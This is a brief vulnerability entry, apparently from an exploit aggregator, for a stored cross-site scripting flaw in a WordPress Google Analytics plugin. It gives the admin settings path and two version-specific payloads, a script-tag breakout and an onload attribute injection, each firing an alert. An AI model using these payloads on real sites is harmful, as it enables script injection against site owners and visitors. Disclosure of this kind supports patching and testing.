Share
## https://sploitus.com/exploit?id=WPEX-ID:23FA477D-444C-4398-A879-CACABA8FF79C
Put the following payloads in the Google Analytics ID settings of the plugin (/wp-admin/customize.php?autofocus[section]=vdz_google_analytics_section), then access the frontend the trigger the XSS

v < 1.4.8: '></script><script>alert(/XSS/)</script>
v < 1.4.9: 'onload='alert(/XSS/)